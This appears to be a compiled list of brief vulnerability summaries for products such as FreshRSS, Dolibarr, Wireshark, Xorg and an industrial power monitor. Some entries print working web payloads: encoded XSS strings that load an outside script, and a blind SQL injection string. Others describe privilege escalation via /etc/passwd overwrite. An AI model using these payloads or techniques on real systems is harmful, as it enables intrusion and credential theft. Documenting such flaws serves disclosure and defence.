HasanMWB 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can send a malicious HTTP request containing a crafted SQL statement to the vulnerable script and gain access to the database. This can be exploited to extract sensitive information such as usernames and passwords.
Multiple Cross-Site Scripting vulnerabilities were discovered in FreshRSS 1.11.1. Blind Cross-site Scripting, Stored Cross-site Scripting, and Cross-site Scripting vulnerabilities were identified. Attack patterns included %27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt+src%3d%22%2f%2f4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e, '"--></style></scRipt><scRipt>netsparker(0x00139F)</scRipt> and %3ciMg+src%3dN+onerror%3dnetsparker(0x001DCF)%3e.
The vulnerability is a stack-based out-of-bounds memory access in Wireshark. It can be triggered by feeding a malformed file to tshark. Three files are attached which trigger the crash.
Authentication is bypassed by using '||' or '&&' instead of ';' to bypass the filter. A payload is then encoded in HEX to bypass the second filter. The payload is then sent to the 'upload_file.php' page to exploit the vulnerability. If the exploitation is successful, the output will be 'Exploitation successful'.
Dolibarr ERP & CRM is a modern and easy to use software package to manage your business. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.
KeyBase Botnet v1.5 is vulnerable to SQL Injection via the 'machinename' GET parameter. An attacker can exploit this vulnerability to gain access to the database and execute malicious SQL queries. The payload used in the PoC is 'type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1'
NEC Univerge WebPro suffers from a 'Predictable Session ID' that can potentially disclose all user account information including passwords stored in clear text in the Web UI. Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.
This exploit is a python script that uses malicious functions to malform a packet and overwrite the MSG_SERVICE_ACCEPT handler. It then performs authentication with the malicious packet and username to check if the username is valid.
Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is running with elevated privileges. The -logfile argument can be used to overwrite arbitrary files in the file system, due to incorrect checks in the parsing of the option. This is a port of the OpenBSD X11 Xorg exploit to run on AIX. It overwrites /etc/passwd in order to create a new user with root privileges.
In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, there are a few buttons are disabled, such as “Edit”, “Remove”, “AddNew”, “Change Policy Holder” and “Security Configuration”. View the source code of login page, those buttons/functions just use the “disabled” parameter to control the access right. It is allow attackers using proxy to erase the “disabled” parameter, and enable those buttons/functions. Once those buttons/functions are enabled. Attackers is capable to add a new user who have administrator right.
Services By CQR